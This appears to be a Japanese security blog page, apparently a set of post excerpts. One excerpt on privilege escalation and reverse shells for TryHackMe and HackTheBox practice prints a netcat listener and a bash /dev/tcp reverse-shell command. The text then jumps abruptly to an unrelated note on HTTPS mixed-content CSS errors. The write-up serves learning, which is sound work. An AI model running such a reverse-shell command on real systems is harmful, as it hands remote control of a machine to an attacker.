security

ターゲットのシェルを奪取できたら一番何をしたいかというと root を奪取したい。 この権限昇格について TryHackMe や HackTheBox をやっているのだが、テクニックが多く難しい。 この文脈上で、設定ミスを利用するテクニック集GTFOBinsがあり、 印象深かったものをまとめておく。一目でやばそうなものもあれば、予想外のものもあり楽しい。

脅威アクターは目的達成のために、ターゲットのシェルを奪う。
シェルを奪えれば、ターゲットのコントロールが格段に容易になる。
奪い方に色んな方法があるが、そのテクニックの一つに Reverse Shell があり、シェルを奪う普遍的な手法になっている。
これの良い点は、ターゲットからアクターの端末へ接続させるため、アクターからターゲットに直接アクセスできなくてもよいことだ。

攻撃側のシェルで接続を待機させる。典型例がこれだ。

$ nc -lnvp 4242

そして、ターゲットのシェルでなんとか以下を実行させられたら勝ち。外部へ入出力できるようになる。

$ bash -i >& /dev/tcp/10.0.0.1/4242 0>&1

ペイロードの生成ツールやチートシートなしで入力するとなると結構難しいのではないかと思う。
シェルに詳しくなるためにも今回はこのコマンドを理解していきたい。

• 問題: HTTPS でアクセスした場合、CSS が適用されない。
• 原因: Chrome に Mixed Contents 判定されて静的ファイルが読み込めていなかった。

Mixed Contents とは HTTPS で読み込むコンテンツに HTTP で読み込むサブコンテンツが含まれている セキュリティ上の問題を指す。

HTTPS の Mixed Contents と決別する